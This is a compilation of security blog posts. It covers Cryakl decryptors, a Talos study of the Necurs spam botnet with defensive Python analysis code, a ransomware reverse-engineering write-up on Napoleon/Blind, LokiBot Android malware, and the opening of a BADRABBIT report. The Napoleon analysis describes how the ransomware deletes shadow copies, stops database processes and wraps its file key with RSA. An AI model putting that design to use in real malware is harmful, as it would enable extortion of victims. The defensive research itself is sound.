The keys have already been added to the RakhniDecryptor tool on the No More Ransom website, and the Belgian federal police is now an official partner of the project. No More Ransom, which has been running since July 2016, has to date provided free help to tens of thousands of people in decrypting files rendered unusable by ransomware, and deprived cyberblackmailers of at least 10 million euros of potential booty.


How to rescue files encrypted by Cryakl ransomware

The No More Ransom site offers two tools for decrypting files corrupted by Cryakl. One, named RannohDecryptor and around since 2016, is for older versions of Cryakl. You can download it at, and get decryption instructions here.

We recently updated the second tool, RakhniDecryptor, by adding the master keys from the servers seized by the Belgian police. It can be downloaded from the same site; instructions are available here. RakhniDecryptor is needed to decrypt files hit by newer versions of Cryakl. Either one of the tools should restore Cryakl-infected files to full health.

How to stay safe in the future

When dealing with cryptoransomware, prevention is far cheaper and simpler than a cure. In other words, it’s better to secure yourself now and sleep easy than to mess around with file decryption. We’d like to share a few preemptive file protection tips:

1. Always keep a copy of your most important files somewhere else: in the cloud, on another drive, on a memory stick, or on another computer. More details about backup options are available here.

2. Use reliable AV software. Some security solutions — for example, Kaspersky Total Security — can also assist with file backup.

3. Don’t download programs from suspicious sources. Their installers might contain something you’d rather not have on your computer.

4. Don’t open attachments in e-mails from unknown senders, even if they look important and credible. If in doubt, look up the phone number on the organization’s official website and call to check.

Go to Source
Author: Anna Markovskaya

The Many Tentacles of the Necurs Botnet


Over the past five years the Necurs botnet has established itself as the largest purveyor of spam worldwide. Necurs is responsible for emailing massive amounts of banking malware, ransomware, dating spam, pump-n-dump stock scams, work from home schemes, and even cryptocurrency wallet credential phishing. Necurs sends so much spam that at times Necurs’ spam campaigns can make up more than 90% of the spam seen by Cisco Talos in one day.

To conduct a deeper analysis of Necurs, Talos extracted 32 distinct spam campaigns sent by Necurs between August 2017 and November 2017. The result was a collection of over 2.1 million spam messages, sent from almost 1.2 million distinct sending IP addresses in over 200 countries and territories.

Necurs Recipients

From an email marketing and delivery perspective, Necurs doesn’t appear to be too sophisticated. Necurs’ recipient database includes email addresses that have been harvested online, commonly deployed role-based accounts, as well as email addresses that appear to have been auto-generated. These are among the worst, most unreliable sources for obtaining email addresses, and no legitimate email marketer would last a day mailing to addresses such as these. Of course, an illegitimate botnet such as Necurs has no such concerns. For many months the email addresses in Necurs’ database seemed to be largely static; Necurs hasn’t actively added any new addresses for at least the past year, possibly two years or more. In November 2017, Necurs stopped mailing to many of the autogenerated accounts.

At one of my personal domains, Necurs has been seen mailing to addresses such as ‘equifax@’, an email address that was originally stolen from Equifax years before the 2017 breach. Necurs also often mails to ‘thisisatestmessageatall@’, another email address I generated and put into the wild long ago. There are also variations on other legitimate addresses, for example ‘aeson@’, ’20jaeson@’, and ‘eson@’, which are all variations on my address ‘jaeson@’. The number 20 was present at the beginning of many of Necurs’ recipient addresses. Hex 20 is the space character, which is written as ‘%20’ in percent-encoded URLs and similar encodings, so such a prefix is a typical artefact of an address scraped from a web page. This provides further indication of the harvested nature of these addresses.

Other addresses in Necurs’ mailing list appear to have been auto-generated. For example ‘EFgUYsxebG@’, ‘ZhyWaTmu@’, and ‘MTAyOvoYkx@’ have never been aliases at my domain that I’ve ever used, and the only mail these accounts ever receive comes from Necurs.

Necurs email received at an auto-generated email address

From our set of Necurs’ spam messages, Talos extracted only the user alias portion of the To: address. There are numerous email aliases, such as role-based addresses, that appear to be in Necurs’ recipient DB across many different recipient domains. Strangely, the list also included some odd email aliases deployed at multiple domains such as ‘unity_unity[0-9]@’, ‘petgord32truew@’, ‘iamjustsendingthisleter@’, ‘docs[0-9]@’, and others.

Email alias and the number of domains in our data in which that alias was found

Interestingly, some of these same strange aliases can be found on Project Honeypot’s list of the Top Dictionary Attacker Usernames, though it is unclear whether Necurs obtained their aliases from this list, or whether these aliases made Project Honeypot’s list as a result of Necurs’ spamming activity.

Project Honeypot’s Top Dictionary Attacker Usernames
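The alias categories described above (role-based accounts, percent-encoding residue, mangled copies of a real alias, and random-looking auto-generated names) can be turned into a classifier that a mail administrator runs over the recipient aliases seen in MTA logs to gauge how a domain is being targeted. The following is an added example written for this post, not Talos code; the role-alias list, the known-good alias ‘jaeson’, the sample alias list and the heuristic thresholds are all constructed assumptions.

```python
import difflib
import re
from collections import Counter

# Role-based aliases that spammers routinely target (assumed list, not from the article).
ROLE_ALIASES = {"info", "admin", "sales", "support", "postmaster", "webmaster", "abuse"}

# Aliases the domain owner actually uses (assumed); everything else is suspect.
KNOWN_GOOD = {"jaeson"}

# Constructed sample list of recipient aliases of the kinds described above.
SAMPLE_ALIASES = ["jaeson", "20jaeson", "aeson", "eson", "info",
                  "EFgUYsxebG", "ZhyWaTmu", "MTAyOvoYkx"]


def case_transitions(s):
    """Count upper/lower switches between adjacent letters; random aliases have many."""
    letters = [c for c in s if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())


def classify_alias(alias, known_good=KNOWN_GOOD):
    """Coarse provenance label for one recipient alias (the local part before '@')."""
    low = alias.lower()
    if low in ROLE_ALIASES:
        return "role_based"
    if low in known_good:
        return "known_good"
    # Hex 20 is a space; '%20' in a scraped URL, minus the '%', leaves a leading '20'.
    m = re.match(r"^(?:%20|20)(.+)$", low)
    if m and m.group(1) in known_good:
        return "percent_encoding_residue"
    # Truncated or mangled copies of a real alias sit close to it in edit distance.
    for good in known_good:
        if difflib.SequenceMatcher(None, low, good).ratio() >= 0.7:
            return "variant_of_known"
    # Auto-generated aliases: mixed case with frequent case switches and no digits.
    if len(alias) >= 8 and case_transitions(alias) >= 3 and not any(c.isdigit() for c in alias):
        return "auto_generated"
    return "unknown"


def summarize(aliases, known_good=KNOWN_GOOD):
    """Histogram of labels, the breakdown a mail admin can pull from delivery logs."""
    return Counter(classify_alias(a, known_good) for a in aliases)


if __name__ == "__main__":
    for alias in SAMPLE_ALIASES:
        print(f"{alias:15} {classify_alias(alias)}")
    print(summarize(SAMPLE_ALIASES))
```

The thresholds are deliberately loose: the goal is a rough picture of which harvesting method produced a given recipient list, which in turn tells you whether an alias like ‘docs1@’ deserves a reject rule or merely a watch.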

Necurs Sending IPs

Next, Talos extracted the sending IP addresses responsible for transmitting Necurs’ spam emails, and we grouped the data according to geographical location. Rather than being uniformly distributed worldwide, a majority of Necurs’ nodes were concentrated in just a few countries: India (25.7% of total spam), Vietnam (20.3% of total spam), and Iran (7.3% of total spam). More than half (51.3%) of the sending IP addresses in our data came from just these three countries. In contrast, other large industrialized nations were responsible for only a tiny fraction of the spam. For example, the United States was home to 6,314 (less than 1%) of Necurs’ sending IPs. Russia was attributed only 38 sending IP addresses out of nearly 1.2 million total sender IPs!

Number of spam messages sent per country

Talos also analyzed the individual spam campaigns in order to determine how often the sending IP addresses were reused from campaign to campaign. We found very little infrastructure reuse. In fact, none of the sending IP addresses in our data were seen across all thirty-two of the campaigns we extracted. Only three sending IP addresses could be found across thirty of Necurs’ spam campaigns. The vast, vast majority of sending IP addresses, 937,761 (78.6% of the total), were only ever seen in a single Necurs spam campaign! This means that the Necurs botnet is large enough to conduct attacks over several months without substantial reuse of most sending nodes, an impressive feat.

Number of unique IP addresses vs. how many campaigns in which they appeared
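The two measurements above (share of spam per sender country, and how many campaigns each sending IP appears in) are straightforward to reproduce from a message set, and the reuse histogram is also what tells you how much a static IP blocklist would have bought. The following is an added example, not Talos tooling; the message tuples use documentation-range IPs and are constructed, not extracted campaign data.

```python
from collections import Counter, defaultdict

# Constructed sample: (campaign_id, sending_ip, country_code) per spam message.
# Documentation-range addresses, not Talos data.
SAMPLE_MESSAGES = [
    ("c1", "203.0.113.10", "IN"), ("c1", "203.0.113.11", "VN"), ("c1", "198.51.100.5", "IR"),
    ("c2", "203.0.113.10", "IN"), ("c2", "198.51.100.7", "US"), ("c2", "203.0.113.12", "IN"),
    ("c3", "203.0.113.10", "IN"), ("c3", "203.0.113.11", "VN"), ("c3", "198.51.100.9", "IR"),
]


def spam_share_by_country(messages):
    """Share of messages per sender country, the breakdown behind the per-country figure."""
    counts = Counter(country for _, _, country in messages)
    total = sum(counts.values())
    return {c: n / total for c, n in counts.items()}


def campaigns_per_ip(messages):
    """Map each sending IP to the set of campaigns it took part in."""
    seen = defaultdict(set)
    for campaign, ip, _ in messages:
        seen[ip].add(campaign)
    return seen


def reuse_histogram(messages):
    """Number of sending IPs that appeared in exactly k campaigns, keyed by k."""
    return Counter(len(c) for c in campaigns_per_ip(messages).values())


def single_use_fraction(messages):
    """Fraction of sending IPs seen in only one campaign (78.6% in the Talos data)."""
    hist = reuse_histogram(messages)
    return hist[1] / sum(hist.values())


def ips_in_every_campaign(messages):
    """Sending IPs present in every campaign in the set (none, in the Talos data)."""
    all_campaigns = {c for c, _, _ in messages}
    return sorted(ip for ip, c in campaigns_per_ip(messages).items() if c == all_campaigns)


def blocklist_coverage(messages, blocked_campaign):
    """Fraction of messages from the other campaigns that a static blocklist built
    from one campaign's sender IPs would have stopped."""
    blocked = {ip for c, ip, _ in messages if c == blocked_campaign}
    others = [ip for c, ip, _ in messages if c != blocked_campaign]
    return sum(1 for ip in others if ip in blocked) / len(others)


if __name__ == "__main__":
    print(spam_share_by_country(SAMPLE_MESSAGES))
    print(reuse_histogram(SAMPLE_MESSAGES), single_use_fraction(SAMPLE_MESSAGES))
    print(ips_in_every_campaign(SAMPLE_MESSAGES))
    print(blocklist_coverage(SAMPLE_MESSAGES, "c1"))
```

On real Necurs volumes the interesting numbers are the tail of `reuse_histogram` (the handful of IPs seen in thirty campaigns are worth blocking outright) and `blocklist_coverage`, which on a botnet with 78.6% single-use senders stays low no matter which campaign seeds the list.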

Necurs Spam Campaigns

Typically email campaigns from Necurs fall into one of two categories: high-volume weekday campaigns, or low volume continuous campaigns. Necurs has occasionally been seen sending high volume campaigns on weekends, but the vast majority of the time high volume campaigns are limited to the business week only. The mailing list database Necurs is using seems to be segmented, such that the high volume campaigns use one subset of email addresses from the DB, and the low volume campaigns use a different set of email addresses.


Below is an example of a pump-n-dump stock spam sent on April 12th, 2017 by Necurs touting the stock symbol QSMG, Quest Management Incorporated. On the following day the price of QSMG peaked at $2.33, probably netting the criminals a tidy gain on their initial investment. QSMG is currently worth less than $0.02.

A message touting the penny stock, QSMG
QSMG was at $2.33 on April 13. Currently it is worth less than $0.02


Necurs also sends dating spam. Recent dating spam has arrived without any URLs in the body, except a mailto: link to an email address. Current dating campaigns have involved one free email provider, while previous dating campaigns took advantage of similar free email services. Necurs’ dating campaigns have also been known to include HTML links to fast-fluxed domains, or sometimes compromised websites (WordPress, etc.).

Necurs dating spam featuring an email address at

If you respond to one of these dating messages, you may be enrolled in a Russian dating website such as the one shown below. In this case, the criminals are making money by referring new users to these dating sites, most likely on an affiliate model.

Marmeladies is one of the dating sites to which victims who reply are directed


Of course, one of Necurs’ most well-known payloads is ransomware. Necurs has been one of the biggest distributors of the Locky ransomware. Locky also works on an affiliate model. Inside each Locky sample, in the metadata, is an affiliate ID, which is always the same (3) for Necurs mailings. Most of the time, very little investment is made in the design of the messages themselves, as in the following example.

A typical ransomware campaign from Necurs


The rise (and fall) in the value of digital currencies such as Bitcoin and Ethereum has not escaped the attention of the Necurs criminals. They have been seen conducting attack campaigns using domains designed to look similar to legitimate wallet management websites. In the email below, note the extra word ‘my’ in the domain ‘’.

This domain is registered to appear similar to the real Ethereum wallet management site,

Recently, the Necurs attackers have drawn from previous stock pump-n-dump scams to come up with a relatively new tactic related to cryptocurrency. They had a spam campaign pumping Swisscoin (SIC).

A Necurs spam email encouraging recipients to buy Swisscoin (SIC)


Necurs was recently sending a low volume job spam campaign which includes links to freshly registered domains. For example, in the email below, sent October 30th 2017, we can see they are using a link to the domain, ‘’. (The affiliate id in the URL is always the same)

An example of a low volume, job-related spam campaign from Necurs



Checking the whois record for this domain, we see the following registration details. Note the registrant email ‘’. This is an attempt by the threat actors to convince the casual observer that the domain is somehow registered through a third-party whois privacy protection service. Email accounts are free to the public, and in this instance the attackers have simply generated the alias ‘whois-agent’ for their use in registering domains.

A review of the domains registered to ‘’ yields 399 domains (from DomainTools as of January 17, 2018). The list of domains registered to ‘’ reads like a who’s who of criminal activity.

Among some of the more notable domains we can see obvious phishing domains:

Typo-squattish domains targeting cryptocoin-related sites:

Fake Flash Player Update domains:

Even domains intended to masquerade as government resources:

A review of some of the domains in passive DNS gives us some other important clues. While most domains are only registered for the minimum of one year, the attackers have chosen to maintain the registration for a longer time on other domains such as ‘’. That domain is home to an online marketplace for buying and selling stolen credit card numbers, stolen SSH account credentials, and more.

‘’ is a website dedicated to buying and selling stolen credit card numbers

Passive DNS also reveals instances where the attackers have hosted domains belonging to different registrants on the same IP address. For example, when Talos analyzed the passive DNS records for one of the attacker’s domains: ‘’ we found that this domain was hosted on a single IP address for a couple months in late 2016 before being parked. When we reviewed the other domains living on that same IP address we saw a bit of a pattern, and most importantly, some of these domains were NOT in the list of domains owned by ‘’.


When we check the registration information for one of the above domains ‘’, we find that there is a different registrant. This time the email address used to register the domain was ‘’. Just as with the ‘’ address, this is an attempt to appear to a casual observer that the domain is protected by whois privacy protection when in reality this email account appears to be under the direct control of the attackers themselves.

Reviewing the list of 1103 domains (Domain Tools as of January 17, 2018) associated with the ‘’ email address we see much of the same illicit activity we saw before.

More phishing domains:

More domains targeting cryptocoin-related resources:

Similar themed, fake Flash Player updates:

We even see targeting of government resources, just as we did with the other registrant account:


Checking the registration on some of the domains associated with ‘’, we can find some domains in which there are other registrants and the whois-privacy@ address is simply an Administrative and Technical Contact. This reveals an additional registrant email address employed by the attackers, ‘’.

According to Domain Tools (as of January 17, 2017), that email address is associated with over 2500 domains. Most of the domains belonging to this registrant email appeared to be domainer-style domains located at TLDs such as .bid and .top, but we also see a heavy dose of illegitimate looking domains in the set as well.

Some typical ‘Domainer’-ish domains:

Illegitimate Domains:


We can associate even more registrant email accounts with these same threat actors using similar techniques. While researching passive DNS for one of the domains we found previously, ‘’, we ran across something very interesting. That particular domain was hosted October 21, 2017 on the IP address which belongs to Alibaba as part of their cloud hosting product. When we analyze all the other domains which have been hosted on that same IP we see many domains that belong to the registrant email addresses we already knew about, ‘’ and ‘’. However we also see several domains associated with different registrants.


Looking at the list of domains found on this same Alibaba IP we find the domain ‘’. This domain is registered to the registrant email address, ‘’. This registrant has registered 125 domains (Domain Tools as of January 17, 2018), many of which have been linked to malicious activities. According to these links, domains associated with this registrant email have been used as part of the Rig Exploit Kit infrastructure. The domain, ‘’, was hosted on the Alibaba IP address on October 19, 2017 –only two days before the IP was used to host domains belonging to ‘’.


The domain ‘’ belongs to the registrant email address ‘’. The ‘’ domain was hosted on the IP on October 25th through October 30th, 2017 –also very close to the timeframe in which we saw the IP hosting the other malicious domains.

As of January 16, 2017, DomainTools attributes 918 domains to the registrant email address ‘’. Among some of the domains associated with this address we find gems such as:


The domain ‘’ is registered to ‘’. A Google search for this domain produces this link at Hybrid Analysis, which indicates that this particular domain was contacted by a piece of malware. At VirusTotal, 50/68 antivirus engines detect this particular sample as malicious.


Searching Google for this registrant email address yields multiple links to malware that reaches out to domains owned by ‘’. VirusTotal corroborates this information, showing 48 and 53 antivirus detections respectively.


Reaching out through various contacts, Talos was able to confirm that, in fact, a single Alibaba cloud instance was controlling this same IP address for the entire time period from October 19, 2017 through October 30, 2017. Is this IP address some part of a criminal domain hosting service? Or is it that a single nefarious enterprise is behind all of these various registrant email accounts and their associated domains? Only the criminals involved in this enterprise can say for certain. Talos continues to monitor this situation with an eye towards further deciphering the business model deployed by these miscreants.
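The pivoting walked through above (registrant email to domain set, domain to hosting IP in passive DNS, co-hosted domains back to new registrant emails, with the time window on the shared IP doing the filtering) is mechanical enough to script. The following is an added example, not Talos code; the whois and passive DNS records, the ‘webmail.example’ provider and every domain, address and date in it are constructed placeholders, and the 14-day co-hosting window is an assumption.

```python
from collections import defaultdict
from datetime import date, timedelta

# Constructed whois records: domain -> registrant email. Placeholders, not report data.
WHOIS = {
    "wallet-login.example": "whois-agent@webmail.example",
    "flash-update.example": "whois-agent@webmail.example",
    "card-shop.example":    "whois-privacy@webmail.example",
    "exploit-gate.example": "ek-registrar@webmail.example",
    "news-site.example":    "owner@news-site.example",
}

# Constructed passive DNS records: (domain, ip, first_seen, last_seen).
PASSIVE_DNS = [
    ("wallet-login.example", "192.0.2.7", date(2017, 10, 21), date(2017, 10, 21)),
    ("exploit-gate.example", "192.0.2.7", date(2017, 10, 19), date(2017, 10, 19)),
    ("card-shop.example",    "192.0.2.7", date(2017, 10, 25), date(2017, 10, 30)),
    ("news-site.example",    "192.0.2.7", date(2016, 3, 1),   date(2016, 3, 15)),
    ("flash-update.example", "192.0.2.9", date(2017, 11, 2),  date(2017, 11, 20)),
]

# Assumed list of free mail providers; a real tool would carry a fuller list.
PUBLIC_WEBMAIL = {"webmail.example"}


def looks_like_fake_privacy_contact(email):
    """A 'whois-*' alias at a free webmail provider is not a real privacy service."""
    local, _, domain = email.partition("@")
    return domain in PUBLIC_WEBMAIL and local.startswith("whois")


def domains_by_registrant(whois):
    """Invert the whois map: registrant email -> set of domains."""
    out = defaultdict(set)
    for domain, email in whois.items():
        out[email].add(domain)
    return out


def cohosted_domains(domain, pdns, window_days=14):
    """Other domains that resolved to one of `domain`'s IPs within window_days of
    the interval in which `domain` itself sat on that IP. Old parked neighbours
    from years earlier are excluded by the window."""
    window = timedelta(days=window_days)
    own = [(ip, first, last) for d, ip, first, last in pdns if d == domain]
    found = set()
    for ip, first, last in own:
        for d, other_ip, ofirst, olast in pdns:
            if d == domain or other_ip != ip:
                continue
            if ofirst <= last + window and olast >= first - window:
                found.add(d)
    return found


def pivot_registrants(seed_domain, whois, pdns, window_days=14):
    """Registrant addresses, other than the seed's own, behind domains co-hosted
    with the seed. Each result is a new pivot point for domains_by_registrant."""
    seed_email = whois.get(seed_domain)
    return {whois[d] for d in cohosted_domains(seed_domain, pdns, window_days)
            if d in whois and whois[d] != seed_email}


if __name__ == "__main__":
    seed = "wallet-login.example"
    print("registrant:", WHOIS[seed], "fake privacy:", looks_like_fake_privacy_contact(WHOIS[seed]))
    print("co-hosted:", sorted(cohosted_domains(seed, PASSIVE_DNS)))
    print("new registrants:", sorted(pivot_registrants(seed, WHOIS, PASSIVE_DNS)))
```

Shared hosting is weak evidence on its own, which is why the window matters: on a cloud IP that is reassigned between tenants, a domain seen there a year earlier says nothing, while domains seen within days of each other under the same instance (as Talos confirmed for the Alibaba address) are worth the follow-up.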


Now that Necurs is back from its regular holiday break, it is attempting to fill our inboxes with junk mail and malware once again. On one hand, the size of the Necurs botnet, and its ability to send from different nodes in every campaign, makes it difficult to defend against: standard IP address blacklists are ineffective against such tactics. Fortunately for network defenders, the fact that Necurs does relatively little to curate its recipient database limits the damage it can do. There are only so many times the same recipients will fall for Necurs’ same, repetitive tricks. We can expect that Necurs will continue to try variations on some of its tried-and-true attacks, so user education against these threats remains paramount.

Author: Talos Group

Napoleon: a new version of Blind ransomware

The ransomware previously known as Blind has been spotted recently with a .napoleon extension and some additional changes. In this post, we’ll analyze the sample for its structure, behavior, and distribution method.

Analyzed samples

31126f48c7e8700a5d60c5222c8fd0c7 – Blind ransomware (the first variant), with .blind extension

9eb7b2140b21ddeddcbf4cdc9671dca1 – Variant with .kill extension

235b4fa8b8525f0a09e0c815dfc617d3 – Variant with .napoleon extension (main focus of this analysis)

//special thanks to @demonslay335 for sharing the older samples

Distribution method

So far, we are not 100 percent sure about the distribution method of this new variant. However, looking at the features of the malware and judging from information from the victims, we suspect that the attackers spread it manually by dropping and deploying it on hacked machines (probably via IIS). This method of distribution is neither popular nor efficient; however, we have encountered similar cases in the past, such as the DMALocker or LeChiffre ransomware. Also, a few months ago, hacked IIS servers were used as a vector to plant Monero miners. The common feature of samples dropped in this way is that they are not protected by any cryptor (because it is not necessary for this distribution method).

Behavioral analysis

After the ransomware is deployed, it encrypts files one-by-one, adding its extension in the format [email].napoleon.

Looking at the content of the encrypted test files, we can see that the same plaintext gave different ciphertext. This always indicates that a different key or initialization vector was used for each file. (After examining the code, it turned out that the difference was in the initialization vector.)

Visualizing the encrypted content helps us guess the algorithm with which the files were encrypted. In this case, we see no visible patterns, which leads us to suspect an algorithm with some method of chaining cipher blocks. (The most commonly used is AES in CBC mode, or possibly CFB mode.) Below, you can see the visualization made with the help of the file2png script: on the left is a BMP file before encryption, and on the right, after encryption by Napoleon:

At the end of each file, we found a unique 384-character block of alphanumeric characters. They represent 192 bytes written in hexadecimal. Most probably, this block is the encrypted initialization vector for the particular file:

The ransom note is in HTA format and looks like this:

It also contains a hexadecimal block, which is probably the victim’s key, encrypted with the attackers’ public key.
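The three observations made so far (the [email].napoleon extension, the absence of any pattern in the ciphertext, and the 384-character hex trailer) are exactly what an incident responder needs to triage a share full of unknown files without the sample. The following is an added example, not Malwarebytes code; it assumes the extension is appended as “.<email>.napoleon” with a dot-free local part, uses a 7.5 bits-per-byte entropy threshold as a working assumption, and constructs its two sample files (a flat BMP-like plaintext and random bytes standing in for AES-CBC output plus a hex trailer) rather than using real Napoleon artefacts.

```python
import math
import os
import re
from collections import Counter

# Assumed filename layout: original name followed by ".<email>.napoleon".
# The article gives the format only as "[email].napoleon"; a dot-free local
# part is an assumption made here so the match anchors on the "@".
NAPOLEON_NAME_RE = re.compile(
    r"\.([A-Za-z0-9_%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\.napoleon$")

# Trailer described above: 192 bytes written as 384 hexadecimal characters.
TRAILER_LEN = 384
TRAILER_RE = re.compile(rb"[0-9A-Fa-f]{384}")


def shannon_entropy(data):
    """Bits per byte: close to 8.0 for ciphertext, far lower for most plaintext."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def extension_email(filename):
    """Return the email embedded in the extension, or None if the name does not match."""
    m = NAPOLEON_NAME_RE.search(filename)
    return m.group(1) if m else None


def has_hex_trailer(data):
    """True if the last 384 bytes are ASCII hex digits (the per-file IV block)."""
    return len(data) >= TRAILER_LEN and TRAILER_RE.fullmatch(data[-TRAILER_LEN:]) is not None


def triage(filename, data, entropy_threshold=7.5):
    """Combine name, trailer and entropy into one verdict; two of three hits is enough."""
    email = extension_email(filename)
    trailer = has_hex_trailer(data)
    body = data[:-TRAILER_LEN] if trailer else data
    ent = shannon_entropy(body)
    score = sum([email is not None, trailer, ent >= entropy_threshold])
    return {"email": email, "hex_trailer": trailer, "entropy": round(ent, 3),
            "likely_napoleon": score >= 2}


# Constructed samples (no real Napoleon artefacts): a two-byte-pattern "BMP" and
# random bytes in place of AES-CBC output, with a 192-byte IV block in hex appended.
PLAINTEXT = b"\xff\x00" * 4096
ENCRYPTED = os.urandom(8192) + os.urandom(192).hex().encode("ascii")
SAMPLE_FILES = {
    "photo.bmp": PLAINTEXT,
    "photo.bmp.decrypt@mail.example.napoleon": ENCRYPTED,   # constructed email
}

if __name__ == "__main__":
    for name, content in SAMPLE_FILES.items():
        print(name, triage(name, content))
```

Entropy alone misfires on compressed formats (ZIP, JPEG, DOCX are all near 8 bits per byte), which is why the verdict needs the trailer or the extension as a second signal; the entropy check is there to catch files the operator renamed after encryption.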

The GUI of Napoleon looks simplified in comparison to the Blind ransomware. However, the building blocks are the same:

It is common among ransomware authors to prepare a Tor-based website that allows automatic processing of payments and better organizes communication with the victim. In this case, the attackers decided to use just an email address—probably because they planned for the campaign to be small.

Among the files created by the Napoleon ransomware, we will no longer find the cache file (netcache64.sys) that in the previous editions allowed the key to be recovered without paying the ransom.

Below is the cache file dropped by the Blind ransomware (the predecessor of Napoleon):

Inside the code

The malware is written in C++. It is not packed by any cryptor.

The execution starts in the function WinMain:

The flow is pretty simple. First, the ransomware checks the privileges with which it runs. If it has sufficient privileges, it deletes shadow copies. Then, it closes processes related to databases—Oracle and SQL Server—so that they will not block access to the database files it wants to encrypt. Next, it goes through the disks and encrypts found files. At the end, it pops up the dropped ransom note in HTA format.

Comparing the code of Napoleon with the code of Blind, we see that not just the extension of encrypted files has changed, but also many functions inside have been refactored.

Below is a fragment of the view from BinDiff: Napoleon vs Blind:

What is attacked?

First, the ransomware enumerates all the logical drives in the system and adds them into a target list. It attacks both fixed and remote drives ( type 3 -> DRIVE_FIXED  and 4 -> DRIVE_REMOTE):

This ransomware does not have any list of attacked extensions. It attacks all the files it can reach. It skips only the files that already have the extension indicating they are encrypted by Napoleon:

The email used in the extension is hardcoded in the ransomware’s code.

Encryption implementation

Just like the previous version, the cryptographic functions of Napoleon are implemented with the help of the statically-linked library Crypto++ (source).

Referenced strings pointing to Crypto++:

Inside, we found a hardcoded blob—the RSA public key of the attackers:

After conversion to a standardized format, such as PEM, we were able to read its parameters using openssl, confirming that it is a valid 2048 bit–long RSA key:

Public-Key: (2048 bit)
Exponent: 17 (0x11)

This attacker’s public key is later used to encrypt the random key generated for the particular victim. The random key is the one used to encrypt files; after it is used and destroyed, its encrypted version is stored in the victim’s ID displayed in the ransom note. Only the attackers, having the private RSA key, are capable of recovering it.

The random AES key (32 bit) is generated by a function provided by the Crypto++ library:

Underneath, it uses the secure random generator CryptGenRandom:

All the files are encrypted with the same key; however, the initialization vector is different for each.

Encrypting a single file:

Inside the function denoted as encrypt_file, the crypto is initialized with a new initialization vector:

The fragment of code responsible for setting the IV:

Setting initialization vector:

Encrypting file content:

The same buffer after encryption:


Napoleon ransomware will probably not become a widespread threat. The authors prepared it for small campaigns—a lot of data, such as the email address, is hardcoded. It does not come with any external configuration like Cerber’s that would allow for fast customization.

So far, it seems that the authors fixed the previous bug in Blind of dropping the cache file. That means the ransomware is not decryptable without having the original key. All we can recommend is prevention.

This ransomware family is detected by Malwarebytes as Ransom.Blind.


Read about how to decrypt the previous Blind variant here.

The post Napoleon: a new version of Blind ransomware appeared first on Malwarebytes Labs.

Author: Malwarebytes Labs

LokiBot: If not stealing, then extorting

Remember the Hydra of ancient mythology? The many-headed serpent that grew two heads when one was chopped off? A similarly dangerous beast has appeared in the Android malware zoo.


LokiBot as a banking Trojan

How do ordinary banking Trojans behave? They present the user with a fake screen that simulates the mobile banking interface. Unsuspecting victims enter their login credentials, which the malware redirects to the attackers, giving them access to the accounts.

How does LokiBot behave? Roughly the same way, but it simulates not only a banking app screen, but also WhatsApp, Skype, and Outlook client interfaces, displaying notifications purporting to come from these applications.

This means that a person can receive a fake notification, supposedly from their bank, saying that funds have been transferred to their account, and, seeing the good news, log in to the mobile banking client for confirmation. LokiBot even makes the smartphone vibrate when it displays the notification about the alleged transfer, which helps hoodwink even clued-in users.

But LokiBot has other tricks in store: It can open a browser, navigate to specific pages, and even use an infected device to send spam, which is basically how it distributes itself. Having pinched money from your account, LokiBot keeps going, sending a malicious SMS to all contacts in the phone book to infect as many smartphones and tablets as possible, and even replying to incoming messages if necessary.

If an attempt is made to remove LokiBot, the malware reveals another facet: To steal funds from a bank account, it needs administrator rights; if you try to deny it permission, it mutates from a banking Trojan into ransomware.


LokiBot as ransomware. How to unlock an infected smartphone

In this case, LokiBot locks the screen and displays a message accusing the victim of viewing child pornography and demanding ransom; it also encrypts data on the device. Examining LokiBot’s code, researchers discovered that it uses weak encryption and doesn’t work properly; the attack leaves unencrypted copies of all files on the device, only under different names, so restoring the files is relatively simple.

However, the device screen is still locked, and the malware creators ask for about $100 in Bitcoin to unlock it. But you don’t have to oblige: After rebooting the device in safe mode, you can strip the malware of administrator rights and delete it. To do so, you first need to determine which version of Android you have:

  • Select Settings.
  • Select the General tab.
  • Select About the device.
  • Find the line Android version — the numbers below it indicate your OS version.

To enable safe mode on a device with Version 4.4 to 7.1, do the following:

  • Press and hold the power button until a menu appears with the option Power off or Disconnect power source.
  • Press and hold Power off or Disconnect power source.
  • In the Turn on safe mode menu that appears, click OK.
  • Wait for the phone to reboot.

Owners of devices with other versions of Android should look online for information about how to enable safe mode for their particular phone.

Unfortunately, not everyone knows about this method of killing the malware: LokiBot victims have already coughed up nearly $1.5 million. And with LokiBot available on the black market for a mere $2,000, it is likely that the criminals responsible have repaid their investment many times over.


How to protect against LokiBot

In effect, the measures that can be taken to protect against LokiBot are applicable to any mobile malware. Here’s how to protect yourself:

– Never click on suspicious links — that’s how LokiBot spreads.

– Download apps only via Google Play — but be cautious even in the official store.

– Install a reliable security solution on your smartphone and tablet. Kaspersky Internet Security for Android detects all variants of LokiBot. With the paid version, there’s no need to scan the smartphone after installing each new application.

Author: Alexandra Golovina

BACKSWING – Pulling a BADRABBIT Out of a Hat

Executive Summary

On Oct. 24, 2017, coordinated strategic web compromises started to
distribute BADRABBIT ransomware to unwitting users. FireEye appliances
detected the download attempts and blocked our user base from
infection. During our investigation into the activity, FireEye
identified a direct overlap between BADRABBIT redirect sites and sites
hosting a profiler we’ve been tracking as BACKSWING. We’ve identified
51 sites hosting BACKSWING and four confirmed to drop BADRABBIT.
Throughout 2017, we observed two versions of BACKSWING and saw a
significant increase in May with an apparent focus on compromising
Ukrainian websites. The pattern of deployment raises the possibility of
a strategic sponsor with specific regional interests and suggests a
motivation other than financial gain. Given that many domains are
still compromised with BACKSWING, we anticipate that there is a risk
that they will be used for future attacks.

Incident Background

Beginning on Oct. 24 at 08:00 UTC, FireEye detected and blocked
attempts to infect multiple clients with a drive-by download
masquerading as a Flash Update (install_flash_player.exe) that
delivered a wormable variant of ransomware. Users were redirected to
the infected site from multiple legitimate sites (e.g.
simultaneously, indicating a coordinated and widespread strategic web
compromise campaign.

FireEye network devices blocked infection attempts at over a dozen
victims primarily in Germany, Japan, and the U.S. until Oct. 24 at
15:00 UTC, when the infection attempts ceased and attacker
infrastructure – both 1dnscontrol[.]com and the legitimate websites
containing the rogue code – were taken offline.

BACKSWING Framework Likely Connected to BADRABBIT Activity

Strategic web compromises can have a significant amount of
collateral targeting. It is common for threat actors to pair a
strategic web compromise with profiling malware to target systems with
specific application versions or victims. FireEye observed that
